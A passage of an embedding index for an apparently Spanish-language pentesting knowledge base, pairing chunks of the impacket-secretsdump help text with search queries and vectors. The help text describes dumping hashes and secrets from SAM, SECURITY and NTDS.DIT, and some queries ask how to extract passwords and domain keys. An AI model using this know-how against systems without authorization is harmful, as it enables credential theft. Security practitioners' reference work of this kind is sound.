-0.04737, -0.00232, 0.03307, 0.06156, -0.06752, -0.00567, 0.0987, -0.04331, 0.14002, 0.00584, 0.03313, 0.0268, -0.01037, 0.03238, -0.00216, -0.02016, -0.02227, -0.0758, 0.01369, 0.02461, 0.07475, 0.07782, -0.04101, -0.03862, 0.10329, -0.08482, -0.09435, 0.0097, -0.06768, 0.02818, 0.05704, 0.01311, -0.03431, -0.06001, 0.10724, -0.08965, -0.09897, 0.03467, 0.01837, 0.00611, 0.08642, 0.05753, -0.04194, -0.10252, -0.00483, 0.01276, 0.01173, -0.0042, 0.08433, -0.15915, 0.08597, -0.06427, 0.00371, -0.03963, -0.02298, -0.05666, -0.02852, -0.07616, 0.08185, -0.02038, -0.05637, -0.07765, 0.04104, -0.09127, -0.0932, -0.00346, 0.02627, 0.07982, 0.01756, -0.0213, -0.00077, 0.02571, -0.03444, -0.07526, -0.12691, -0.11442, -0.01882, 0.07421, 0.04787, -0.00028, -0.03209, -0.06781, 0.05183, -0.08642, 0.04265, 0.0289, -0.03126, 0.03317, -0.02544, -0.02475, -0.01996, -0.13554, 0.06291, -0.03539, 0.06174, 0.00275, -0.01519, -0.09743, -0.04359, -0.08555, 0.09893, 0.01279, -0.02734, -0.02949, 0.03539, 0.08647, 0.03124, -0.02365, -0.07073, -0.00974, 0.01446, -0.001, 0.04, 0.03457, -0.1087, 0.10555, -0.03066, -0.01234, -0.06884, -0.0327, 0.03277, 0.01966, 0.01358, -0.05477, -0.01113, -0.03916, -0.02609, 0.04367, -0.02009, 0.01211, -0.00277, -0.00413, 0.03975, -0.05282, -0.0672, 0.03175, -0.03856, 0.03342, -0.04994, 0.01498, -0.06332, -0.06722, -0.0561, 0.03463, -0.06144, -0.02671, 0.02973, -0.03292, 0.0065, -0.03893, 0.14229, 0.08327, 0.04545, 0.07548, -0.05339, -0.04459, 0.01058, 0.03642, -0.04336, 0.01261, 0.03475, 0.04787, 0.05325, 0.04185, 0.0269, 0.00872, 0.04055, 0.00757, 0.00335, -0.00795, 0.01437, -0.02164, -0.00831, -0.00044, 0.03386, 0.00808, 0.00837, 0.00593, 0.02349, -0.00981, -0.05348, 0.04046, 0.03856, -0.05289, 0.00638, -0.02988, -0.00446, -0.08758, 0.03014, -0.03932, -0.04228, -0.01147, 0.00752, 0.04336, -0.00243, 0.0817, -0.00074]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-secretsdump β€” manual\n\nSalida de `impacket-secretsdump -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]\n [-security SECURITY] [-sam SAM] [-ntds NTDS]\n [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]\n [-use-vss] [-rodcNo RODCNO] [-rodcKey RODCKEY]\n [-use-keylist]\n [-exec-method [{smbexec,wmiexec,mmcexec}]]\n [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]\n [-pwd-last-set] [-user-status] [-history]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k]\n [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]\n [-target-ip ip address]\n target\n\nPerforms various techniques to dump secrets from the remote machine without\nexecuting any agent there.", "indexar": "quΓ© programa puedo usar para descargar secretos de una mΓ‘quina remota sin ejecutar agentes allΓ­", "v": [0.04938, 0.06092, -0.17891, -0.11372, 0.05274, -0.00603, -0.07455, -0.032, -0.05343, -0.0316, -0.11662, -0.03355, 0.05169, -0.03128, 0.1392, 0.00848, 0.094, 0.09346, 0.06003, 0.03574, 0.07356, -0.07509, 0.00456, -0.06455, -0.05788, 0.04414, 0.13078, 0.05556, -0.10701, -0.05805, 0.00583, 0.06019, 0.10382, -0.1462, 0.01957, -0.00696, 0.02001, 0.01001, 0.08047, 0.05818, 0.09747, 0.01233, -0.10437, 0.03055, 0.09717, 0.02024, 0.07127, -0.08519, 0.00599, -0.04581, -0.04303, -0.09871, -0.03549, -0.06482, 0.04753, -0.20297, 0.13819, -0.08174, 0.00015, 0.03065, 0.01534, 0.02823, 0.01454, 0.02468, 0.07666, -0.05327, 0.04698, -0.0208, -0.09559, -0.0202, -0.07409, 0.02747, 0.06565, 0.04298, -0.0147, 0.00281, -0.07042, -0.09808, 0.01908, -0.00037, -0.03044, 0.02975, -0.059, 0.00381, -0.09576, -0.16737, 0.07654, -0.04451, 0.00268, -0.15655, 0.05015, 0.00557, -0.01666, 0.05499, 0.14329, -0.02487, 0.10445, -0.02094, 0.06151, 0.10181, 0.11089, -0.07409, -0.04374, 0.17995, -0.01799, 0.07351, 0.0511, -0.00839, 0.01361, -0.01641, 0.02929, 0.00268, -0.05415, -0.05402, -0.07846, 0.00228, 0.03047, -0.04878, -0.01009, -0.05256, -0.18208, 0.04052, -0.06243, -0.01301, 0.12674, -0.0781, -0.01526, 0.13008, -0.05541, 0.02469, 3e-05, -0.01624, -0.06282, 0.00444, 0.00593, -0.02589, 0.00037, -0.11979, -0.05144, -0.12823, 0.03259, -0.02711, -0.04134, -0.00074, 0.06879, -0.00876, 0.03684, -0.10092, -0.00864, -0.0065, 0.0907, -0.0289, -0.02484, 0.0594, -0.05192, -0.01054, 0.01861, -0.09103, -0.06212, 0.03263, -0.05605, 0.01557, -0.08441, -0.02929, 0.0176, -0.05094, 0.01935, -0.01668, -0.00455, 0.10857, -0.04283, 0.00504, 0.0418, -0.08944, 0.03453, -0.02985, 0.02523, -0.05297, 0.0483, -0.03179, -0.08791, 0.06795, 0.04347, -0.0816, -0.04625, 0.02834, -0.03402, -0.0027, -0.01824, 0.03277, -0.01729, 0.02844, -0.00814, -0.00192, 0.01199, 0.0029, -0.02753, 0.00997, 0.06124, -0.09126, -0.0571, -0.0409, -0.05137, -0.01319, 0.09306, 0.04607, -0.03487, 0.02271, -0.03523, 0.08681, 0.0372, -0.0508, 0.03981, -0.04946, -0.0387, -0.00925, -0.00267, -0.01877, -0.00545, 0.06282, -0.01777, -0.00365, 0.09337, 0.01461, 0.02564, -0.0397, 0.06212, 0.05641, 0.05375, 0.0525, -0.04358, 0.05155, -0.02379, -0.02992, 0.0228, -0.00736, -0.02411, -0.0371, -0.02023, -0.07352, -0.04895, 0.12369, 0.02937, -0.10458, -0.03123, -0.03137, -0.05904, -0.00152, -0.0075, -0.04033, -0.03271, 0.05045, 0.05116, -0.01647, -0.01202, 0.01088]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-secretsdump β€” manual\n\nSalida de `impacket-secretsdump -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]\n [-security SECURITY] [-sam SAM] [-ntds NTDS]\n [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]\n [-use-vss] [-rodcNo RODCNO] [-rodcKey RODCKEY]\n [-use-keylist]\n [-exec-method [{smbexec,wmiexec,mmcexec}]]\n [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]\n [-pwd-last-set] [-user-status] [-history]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k]\n [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]\n [-target-ip ip address]\n target\n\nPerforms various techniques to dump secrets from the remote machine without\nexecuting any agent there.", "indexar": "cual es la herramienta que sirve para extraer hashes y contraseΓ±as desde un sistema objetivo", "v": [0.12826, 0.0164, -0.13499, -0.1478, 0.08246, -0.1627, -0.11143, -0.12992, -0.03379, -0.011, -0.15868, 0.01998, -0.05678, -0.07586, 0.09825, 0.04989, 0.12677, -0.07396, -0.0471, 0.05404, -0.06909, -0.01963, -0.14105, -0.01504, -0.12627, -0.0095, -0.01634, 0.03109, -0.27663, 0.06338, -0.00698, 0.02086, 0.04132, -0.00975, -0.07394, 0.04086, -0.02662, 0.14523, -0.00629, 0.05008, 0.03918, 0.05939, -0.12949, 0.05653, 0.03517, -0.04848, 0.04689, 0.07918, 0.07717, 8e-05, -0.06371, -0.08442, -0.17022, -0.04983, 0.02529, -0.19529, 0.13986, -0.04985, -0.04099, -0.07824, -0.13213, 0.04206, -0.00287, -0.04024, -0.04481, -0.11243, 0.01161, -0.06383, -0.1265, 0.10108, -0.00368, 0.05333, 0.05907, 0.01741, 0.00504, 0.02117, 0.03588, -0.01626, 0.04039, -0.00734, 0.01319, -0.0626, -0.06647, 0.01204, -0.09692, -0.0243, 0.11205, -0.02315, 0.02513, -0.04929, 0.0303, 0.02441, 0.03015, 0.03101, 0.02112, -0.05037, 0.03075, 0.01311, -0.04908, -0.03474, 0.05997, -0.07875, -0.08948, 0.1712, -0.04485, -0.03143, 0.01284, 0.02379, 0.01385, -0.06098, 0.04891, -0.01363, 0.01288, -0.02543, -0.02756, 0.00079, -0.02759, 9e-05, -0.01688, -0.02515, -0.0501, -0.00999, -0.01545, -0.01866, 0.08728, 0.02109, -0.04122, 0.03837, -0.01597, -0.10445, 0.04199, 0.01432, -0.08782, 0.05374, -0.01999, 0.00616, 0.0544, -0.12958, -0.0692, -0.01479, 0.00418, 0.03741, 0.00783, -0.09523, 0.07335, 0.01578, 0.06792, -0.02733, -0.03521, -0.04493, -0.01055, -0.02677, 0.03454, -0.00158, -0.07361, 0.02103, -0.03949, -0.06505, -0.11178, 0.08047, -0.05172, -0.09267, 0.02667, 0.01696, -0.01314, -0.03772, -0.01955, -0.03505, 0.09542, 0.04631, 0.03429, -0.00032, 0.06618, -0.03572, 0.02557, -0.02662, -0.01738, -0.09103, 0.04719, -0.08042, -0.06127, 0.01079, -0.0201, -0.0182, 0.00675, -0.07384, 0.06973, 0.01497, -0.00594, 0.01266, 0.05051, 0.01391, -0.03105, -0.01768, 0.00293, -0.00341, -0.03412, -0.07215, 0.05589, -0.04273, -0.03949, 0.01993, 0.0258, -0.0798, 0.02164, 0.08605, -0.02484, -0.07392, -0.04072, 0.05435, 0.04314, 0.04111, 0.03835, -0.0205, -0.09064, -0.01046, -0.00973, 0.02511, -0.03028, -0.01927, 0.02168, 0.02103, 0.07903, 0.03095, -0.03966, -0.00376, 0.00823, 0.08106, 0.0077, -0.04819, 0.00801, -0.02789, -0.01595, 0.01078, 0.04742, -0.03445, -0.01523, -0.02407, -0.04167, -0.08476, -0.01914, 0.06492, 0.01596, -0.06643, -0.02772, -0.05141, -0.02593, 0.02594, 0.00477, -0.0965, -0.05274, 0.03901, 0.05035, -0.02002, 0.01375, -0.03356]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "positional arguments:\n target [[domain/]username[:password]@]\n or LOCAL (if you want to parse local files)", "indexar": "que programa sirve para conectar con un servidor remoto", "v": [0.05476, 0.04361, -0.23092, -0.23991, 0.04211, -0.1145, 0.02037, -0.05715, 0.05455, -0.05399, -0.13344, -0.09698, 0.07182, -0.09623, 0.05358, 0.09365, 0.15162, -0.05373, 0.06046, 0.07703, 0.07615, 0.06009, 0.06689, -0.0457, -0.0447, 0.03928, 0.13224, -0.02068, -0.05204, -0.04345, 0.05597, -0.09417, 0.05249, -0.00902, 0.04943, -0.07992, 0.01466, 0.19705, -0.02243, 0.06304, 0.07537, -0.00056, -0.0783, 0.00406, 0.06209, 0.01474, 0.14263, -0.09602, 0.07609, 0.03717, -0.12194, -0.03235, -0.09943, -0.03378, -0.04269, 0.01987, 0.03517, -0.18069, 0.0055, -0.01752, -0.11754, -0.02189, -0.00877, -0.08949, 0.07091, -0.05664, -0.04337, -0.0446, -0.11703, -0.024, -0.08156, 0.00631, 0.00249, -0.06263, 0.02561, 0.06647, -0.01983, -0.06028, 0.08572, -0.00191, -0.0094, -0.01338, 0.00088, 0.07451, -0.13661, -0.03328, 0.05467, 0.02228, 0.0386, -0.00663, 0.07158, 0.07968, -0.04242, 0.03723, 0.0649, -0.0376, 0.12559, -0.05901, 0.02024, 0.00813, 0.10166, 0.04441, -0.04154, 0.10825, -0.03635, 0.07724, 0.15126, -0.03186, -0.02149, 0.04206, 0.03316, -0.01339, -0.03745, -0.05883, -0.09238, -0.07688, -0.01799, -0.01594, 0.07201, 0.05148, -0.1046, 0.01688, 0.02197, 0.06161, 0.02378, -0.0089, 0.00146, 0.06255, 0.02056, 0.07047, 0.00384, 0.01332, -0.02442, -0.0566, -0.05652, -0.02624, 0.04235, -0.09095, -0.06671, -0.09324, 0.03793, 0.05097, 0.00435, 0.00853, 0.06494, -0.01561, 0.07004, -0.05799, -0.01022, 0.0618, 0.0376, -0.01126, -0.0916, 0.0282, -0.11703, -0.05258, 0.00775, -0.0424, -0.07705, 0.07226, 0.00184, 0.0013, 0.06259, -0.00617, 0.06374, -0.03197, -0.0455, 0.00951, 0.12144, 0.11308, -0.08685, 0.07298, 0.017, -0.04265, -0.05414, 0.00102, -0.03115, -0.07304, 0.0435, -0.00397, -0.09828, 0.01449, 0.0039, -0.02875, -0.01472, 0.01213, -0.04182, -0.00575, 0.00881, 0.00533, -0.01368, -0.01183, -0.06659, 0.03914, 0.0562, -0.0798, -0.04666, -0.04043, 0.02194, 0.01441, -0.06064, -0.03137, 0.01297, -0.00302, 0.03786, 0.06443, -0.01901, 0.03277, 0.03754, 0.10925, -0.00885, -0.06174, 0.09353, -0.01217, -0.03214, -0.01599, 0.02276, -0.04753, 0.04048, 0.05045, -0.00791, -0.01545, -0.02034, 0.02436, 0.02921, -0.00892, 0.02106, -0.0029, 0.05073, -0.03964, -0.04238, -0.01931, -0.0142, -0.02199, 0.00811, -0.04609, -0.00136, -0.07021, -0.03606, -0.07339, -0.02564, 0.08605, -0.01278, -0.06417, -0.01566, -0.05013, -0.05766, -0.00233, -0.02257, -0.02515, -0.04019, -0.00646, 0.04073, -0.03508, 0.02737, 0.02993]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "positional arguments:\n target [[domain/]username[:password]@]\n or LOCAL (if you want to parse local files)", "indexar": "con que puedo leer archivos de texto local", "v": [-0.0723, 0.02337, -0.00599, -0.11687, -0.02729, -0.07074, -0.0116, 0.09212, 0.00454, -0.03921, -0.13986, -0.08161, 0.08661, -0.01529, 0.0397, 0.02805, 0.14442, 0.03598, 0.07918, -0.08075, 0.00673, -0.04546, -0.13049, 0.03889, 0.09387, -0.08814, 0.01371, 0.00094, -0.01673, 0.0161, -0.19462, 0.07707, 0.04793, -0.01207, -0.03554, 0.14012, 0.10179, 0.14312, -0.17602, 0.07441, 0.06285, 0.14069, -0.05583, 0.07871, -0.06291, -0.09285, 0.03937, -0.0343, -0.09283, -0.02132, -0.01921, -0.05737, 0.02451, -0.00045, -0.15153, 0.13916, 0.08635, -0.07037, 0.03216, 0.01193, -0.06791, 0.05953, -0.12396, -0.09775, -0.02927, 0.10791, 0.05605, 0.11865, -0.08891, 0.08577, 0.00896, 0.0565, 0.0629, 0.03308, -0.09993, 0.08164, -0.05932, -0.05422, 0.05179, 0.00549, 0.08764, 0.02293, -0.02484, 0.01488, 0.06051, -0.01234, -0.06586, -0.02322, 0.13148, 0.00454, 0.013, -0.05603, 0.03523, -0.03777, -0.0707, -0.05017, 0.03444, -0.07713, -0.11362, 0.02843, -0.03838, -0.10166, 0.05688, 0.06096, 0.16362, -0.01361, -0.04912, 0.14259, 0.07135, -0.0688, 0.1348, -0.00938, -0.05784, 0.13161, -0.06119, 0.00863, 0.04663, 0.05913, 0.02877, -0.01878, -0.03468, 0.02023, -0.05495, -0.0387, 0.07169, 0.0227, 0.08825, 0.01443, -0.06988, 0.06858, 0.04684, 0.06512, -0.02002, -0.12003, -0.01164, -0.02872, 0.07158, 0.08567, -0.08228, 0.02207, 0.01134, -0.00749, -0.02553, 0.13388, 0.00816, 0.00809, -0.03602, -0.02115, 0.01021, -0.12571, -0.07803, -0.06271, 0.02448, -0.03515, -0.05168, 0.02482, 0.09712, -0.04476, 0.00157, -0.00432, -0.02763, 0.08535, -0.08516, 0.03595, -0.04321, -0.09716, -0.05685, 0.02947, 0.00725, -0.05003, -0.04551, 0.03287, -0.00421, -0.0057, 0.03729, 0.0629, 0.02068, 0.00722, -0.02874, -0.00357, 0.02163, -0.01853, -0.04184, 0.08611, 0.02318, -0.00333, 0.07104, -0.01892, -0.03329, -0.00615, -0.04876, -0.03604, -0.02285, 0.00588, -0.04472, -0.02852, -0.04552, 0.06216, -0.01619, -0.06389, -0.06521, -0.02966, -0.03467, 0.07773, 0.02901, 0.02395, -0.03497, 0.00056, -0.03699, 0.02225, 0.00302, 0.01797, 0.04706, 0.02701, 0.00692, -0.02857, -0.02545, -0.02822, 0.02536, 0.0624, 0.06859, 0.01894, 0.09785, -0.0065, 0.01093, -0.0299, -0.04495, -0.03574, -0.00251, 0.05237, -0.01358, 0.01119, -0.0515, 0.0376, -0.00906, -0.00857, -0.01294, 0.03076, -0.03616, -0.02167, -0.00173, 0.04936, -0.0216, -0.02384, -0.05991, -0.0198, -0.09301, 0.00685, 0.00057, 0.00802, -0.00593, -0.04055, 0.02766, 0.02219, 0.06628, 0.02855]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -ts Adds timestamp to every logging output\n -debug Turn DEBUG output ON\n -system SYSTEM SYSTEM hive to parse\n -bootkey BOOTKEY bootkey for SYSTEM hive\n -security SECURITY SECURITY hive to parse\n -sam SAM SAM hive to parse\n -ntds NTDS NTDS.DIT file to parse\n -resumefile RESUMEFILE\n resume file name to resume NTDS.DIT session dump (only\n available to DRSUAPI approach). This file will also be\n used to keep updating the session's state\n -outputfile OUTPUTFILE\n base output filename. Extensions will be added for\n sam, secrets, cached and ntds\n -use-vss Use the VSS method instead of default DRSUAPI\n -rodcNo RODCNO Number of the RODC krbtgt account (only avaiable for\n Kerb-Key-List approach)\n -rodcKey RODCKEY AES key of the Read Only Domain Controller (only\n avaiable for Kerb-Key-List approach)\n -use-keylist Use the Kerb-Key-List method instead of default\n DRSUAPI\n -exec-method [{smbexec,wmiexec,mmcexec}]\n Remote exec method to use at target (only when using\n -use-vss). Default: smbexec", "indexar": "que programa puedo usar para extraer la informaciΓ³n de las hives del sistema", "v": [0.11334, 0.01944, -0.18756, -0.06769, 0.13331, -0.09783, -0.06161, -0.09314, -0.07915, -0.09702, -0.13613, -0.08463, -0.03236, -0.02532, 0.0448, -0.0345, 0.09669, -0.11523, -0.03821, -0.02348, -0.02868, 0.06398, -0.09995, 0.03047, -0.15197, 0.0444, -0.00368, 0.02623, -0.19501, -0.02083, -0.00309, 0.04021, -0.00022, -0.04427, -0.09066, -0.00034, -0.04388, 0.02612, 0.0113, -0.02777, 0.09077, -0.07535, -0.05977, 0.00623, -0.01166, 0.03301, -0.01754, -0.03156, 0.00246, -0.05613, -0.08581, 0.01941, -0.15413, -0.04691, 0.06176, -0.15519, -0.0452, -0.06862, -0.1112, -0.02223, 0.05738, 0.06922, 0.02284, -0.12767, 0.04314, 0.0033, 0.06086, -0.06485, -0.16381, 0.06137, 0.01413, 0.03676, 0.12443, 0.0223, -0.01704, 0.06139, 0.04026, -0.08139, 0.04328, -0.07232, -0.06266, 0.02287, -0.0195, 0.05887, -0.03843, -0.03915, 0.09965, -0.0879, -0.04351, -0.06969, 0.03349, 0.01179, 0.02505, 0.05553, 0.1511, -0.1201, 0.04917, 0.10609, 0.00921, -0.00851, 0.05084, -0.05977, -0.03118, 0.13396, -0.07351, 0.01345, 0.11057, -0.05634, -0.0239, -0.04381, -0.07287, -0.02476, -0.0652, -0.06377, -0.10802, 0.00747, 0.00717, 0.03424, -0.03294, -0.06595, -0.04555, 0.03974, 0.02611, -0.05108, 0.11707, -0.05352, -0.00105, 0.10758, 0.006, 0.04485, 0.00487, -0.00388, -0.00013, 0.01084, -0.03379, -0.06606, -0.03116, 0.00682, 0.00665, -0.04895, -0.02161, 0.06325, -0.02149, -0.0135, 0.05913, -0.04862, -0.02581, -0.04757, -0.00892, -0.04725, 0.02266, 0.01584, 0.01948, 0.00853, -0.11149, -0.02535, 0.07723, -0.05594, -0.02129, -0.0019, -0.06922, -0.07066, -0.0106, -0.0156, 0.10148, -0.0298, -0.00169, -0.05403, 0.06723, 0.07005, 0.03178, 0.07212, 0.05038, -0.0812, 0.01685, -0.01186, 0.01069, -0.08715, 0.04296, 0.01137, -0.13368, 0.03943, 0.01026, -0.0366, -0.01987, 0.01734, -0.00439, 0.04447, -0.01188, 0.06322, 0.01243, 0.09163, 0.02863, 0.0227, -0.02426, -0.00262, -0.02189, -0.04722, 0.08964, -0.06038, -0.05642, 0.0734, 0.03175, -0.05595, 0.02795, 0.09375, -0.01286, 0.00867, 0.02011, 0.0977, 0.08617, -0.04687, 0.11054, -0.01019, -0.09817, -0.0112, -0.00666, 0.00789, 0.0221, 0.01642, 0.01734, 0.05106, 0.08864, 0.09914, -0.01117, -0.05614, 0.05008, 0.04597, 0.0009, 0.01257, -0.01552, -0.0271, 0.02163, -0.04395, -0.01343, -0.02601, -0.00731, -0.01653, -0.06871, -0.10702, 0.00544, 0.11021, -0.01357, -0.06445, -0.03555, -0.01217, -0.09823, 0.01709, 0.02716, -0.07799, -0.01169, 0.04142, 0.04507, -0.07769, 0.04615, 0.04668]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -ts Adds timestamp to every logging output\n -debug Turn DEBUG output ON\n -system SYSTEM SYSTEM hive to parse\n -bootkey BOOTKEY bootkey for SYSTEM hive\n -security SECURITY SECURITY hive to parse\n -sam SAM SAM hive to parse\n -ntds NTDS NTDS.DIT file to parse\n -resumefile RESUMEFILE\n resume file name to resume NTDS.DIT session dump (only\n available to DRSUAPI approach). This file will also be\n used to keep updating the session's state\n -outputfile OUTPUTFILE\n base output filename. Extensions will be added for\n sam, secrets, cached and ntds\n -use-vss Use the VSS method instead of default DRSUAPI\n -rodcNo RODCNO Number of the RODC krbtgt account (only avaiable for\n Kerb-Key-List approach)\n -rodcKey RODCKEY AES key of the Read Only Domain Controller (only\n avaiable for Kerb-Key-List approach)\n -use-keylist Use the Kerb-Key-List method instead of default\n DRSUAPI\n -exec-method [{smbexec,wmiexec,mmcexec}]\n Remote exec method to use at target (only when using\n -use-vss). Default: smbexec", "indexar": "con que herramienta puedo montar una sesiΓ³n de descarga del archivo NTDS.DIT", "v": [-0.06651, -0.0469, -0.13113, -0.22727, -0.02348, -0.01558, -0.14362, 0.11943, -0.06009, 0.13407, -0.12076, -0.09305, -0.02034, -0.16208, -0.04928, -0.02954, 0.15233, -0.10567, 0.07558, -0.03641, -0.03053, -0.05926, -0.03476, -0.0567, 0.03089, 0.01805, 0.02023, 0.04132, -0.22152, 0.11447, 0.00881, 0.0123, -0.0137, -0.02141, -0.04269, -0.13634, 0.01456, 0.05151, 0.00289, -0.0083, -0.00214, 0.14712, -0.11252, 0.1684, 0.03223, -0.09938, -0.01381, -0.01634, 0.03452, -0.05812, 0.07422, -0.02602, -0.02964, 0.01308, -0.0845, -0.16532, 0.19272, -0.16642, 0.07563, 0.00037, -0.08336, 0.10876, -0.10141, -0.04086, -0.01183, -0.11057, 0.07007, 0.02118, -0.11961, 0.06656, -0.11431, 0.00566, 0.03053, -0.0187, -0.04802, -0.03338, -0.0649, -0.04922, -0.03329, 0.02025, 0.0595, -0.0558, 0.00994, 0.04922, -0.19809, -0.05636, 0.01523, -0.0004, 0.01543, -0.06445, 0.05758, 0.03981, 0.02528, -0.06296, 0.06538, -0.11768, 0.04428, 0.09327, 0.01021, -0.03858, 0.02901, 0.0409, 0.03117, 0.08925, 0.02517, 0.00941, -0.01366, 0.02138, -0.0384, -0.03553, 0.11672, 0.05165, 0.04049, 0.08632, -0.01172, -0.0118, -0.02352, -0.02297, -0.04785, -0.01401, 0.04202, 0.06174, -0.0129, -0.01319, -0.02451, -0.01946, 0.01907, 0.07911, -0.11776, -0.08763, 0.02836, -0.05785, -0.09283, 0.02422, 0.00569, -0.03343, 0.01871, -0.04888, -0.07798, -0.09587, 0.04593, 0.027, 0.00423, -0.01153, 0.07291, 0.02468, -0.00724, -0.08544, 0.00371, -0.02835, 0.14077, 0.0042, 0.04875, -0.04559, -0.04791, 0.03972, 0.03912, 0.00412, -0.04494, 0.05551, -0.05871, 0.01304, 0.0177, 0.00844, -0.01961, -0.05549, -0.0009, -0.00209, 0.03101, -0.03718, 0.01162, -0.03243, -0.00306, -0.05884, 0.01947, -0.07305, -0.00794, -0.05162, 0.04129, -0.07263, -0.06036, -0.0139, 0.03171, 0.00092, -0.02344, -0.04454, 0.04224, -0.03, -0.00851, -0.01935, -0.00179, 0.06585, -0.07438, -0.01609, 0.0344, 0.0111, -0.02706, -0.01471, 0.0113, 0.04746, -0.0603, -0.03829, -0.02275, -0.02027, 0.04118, 0.02699, -0.03384, 0.04918, -0.03191, -0.00535, 0.05985, 0.04463, 0.03878, -0.07756, 0.00639, -0.02351, 0.0106, 0.05123, -0.02533, 0.02221, -0.02699, 0.05689, 0.09424, 0.00267, 0.01323, -0.01213, 0.03107, 0.04164, 0.00826, 0.01335, 0.03746, 0.0572, -0.00602, -0.00737, 0.0534, 0.00632, 0.03082, 0.03182, -0.02189, -0.01597, 0.02651, 0.05886, 0.03132, -0.02044, 0.00069, -0.02468, 0.00919, -0.01211, 0.0249, -0.07055, -0.03614, -0.02202, 0.03783, -0.00661, -0.026, -0.03708]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -ts Adds timestamp to every logging output\n -debug Turn DEBUG output ON\n -system SYSTEM SYSTEM hive to parse\n -bootkey BOOTKEY bootkey for SYSTEM hive\n -security SECURITY SECURITY hive to parse\n -sam SAM SAM hive to parse\n -ntds NTDS NTDS.DIT file to parse\n -resumefile RESUMEFILE\n resume file name to resume NTDS.DIT session dump (only\n available to DRSUAPI approach). This file will also be\n used to keep updating the session's state\n -outputfile OUTPUTFILE\n base output filename. Extensions will be added for\n sam, secrets, cached and ntds\n -use-vss Use the VSS method instead of default DRSUAPI\n -rodcNo RODCNO Number of the RODC krbtgt account (only avaiable for\n Kerb-Key-List approach)\n -rodcKey RODCKEY AES key of the Read Only Domain Controller (only\n avaiable for Kerb-Key-List approach)\n -use-keylist Use the Kerb-Key-List method instead of default\n DRSUAPI\n -exec-method [{smbexec,wmiexec,mmcexec}]\n Remote exec method to use at target (only when using\n -use-vss). Default: smbexec", "indexar": "cual es una alternativa libre para recuperar claves de dominio y cuentas RODC", "v": [-0.01919, -0.04372, -0.0503, -0.04297, 0.04211, -0.06472, 0.12493, 0.0108, -0.20943, 0.01566, -0.0518, -0.28507, -0.11724, -0.1659, 0.10164, -0.08871, 0.12534, 0.02463, -0.02751, -0.11945, -0.03634, -0.24688, -0.04417, -0.01487, 0.02607, -0.10405, 0.03874, 0.02928, -0.0599, 0.10786, 0.14009, -0.11022, 0.03607, 0.0338, 0.01938, 0.01644, 0.07745, 0.10864, 0.10887, -0.0067, 0.07006, -0.02773, -0.18649, 0.12357, 0.07431, -0.08023, -0.01453, 0.04768, 0.03889, -0.06484, -0.06939, -0.11656, -0.12753, -0.05234, -0.00531, -0.01066, 0.06767, 0.01517, -0.0297, -0.08426, -0.12646, 0.01677, 0.06056, 0.02695, -0.0072, -0.03615, -0.0596, 0.04754, -0.0384, 0.13609, 0.01969, -0.00401, 0.07125, 0.00944, -0.03752, -0.06477, 0.11075, -0.08452, -0.01591, 0.06393, 0.00133, -0.09522, -0.02001, 0.03785, -0.05446, -0.04845, 0.05352, -0.03247, 0.05199, 0.0254, 0.07229, -0.07817, -0.06028, 0.08323, -0.05177, -0.02295, -0.01826, 0.00667, -0.06204, -0.02015, 0.03202, 0.12509, -0.13393, 0.0246, 0.05557, 0.09406, 0.03097, -0.06075, -0.09847, -0.01756, -0.06559, 0.01814, -0.05836, 0.01292, -0.04775, 0.0541, -0.07728, 0.04555, -0.0025, -0.02584, -0.0205, -0.01525, -0.00071, -0.04492, -0.0292, -0.00342, 0.03285, -0.03794, -0.0092, -0.09084, 0.03772, -0.04231, -0.03636, -0.04998, -0.03238, 0.0358, 0.06378, 0.0041, -0.03733, -0.01293, -0.03353, 0.03107, -0.01535, -0.05072, 0.04731, -0.04421, 0.09752, -0.08269, -0.07179, 0.02342, -0.0125, 0.0069, -0.06625, 0.06006, -0.05517, 0.04128, -0.09335, -0.0007, -0.08379, 0.06298, -0.10515, -0.05167, -0.04682, 0.02994, 0.05775, -0.0542, -0.00463, 0.01544, -0.0158, 0.00363, -0.02857, 0.0786, 0.06332, -0.07496, 0.00826, -0.08608, 0.03078, -0.12122, -0.03102, -0.06723, 0.01449, 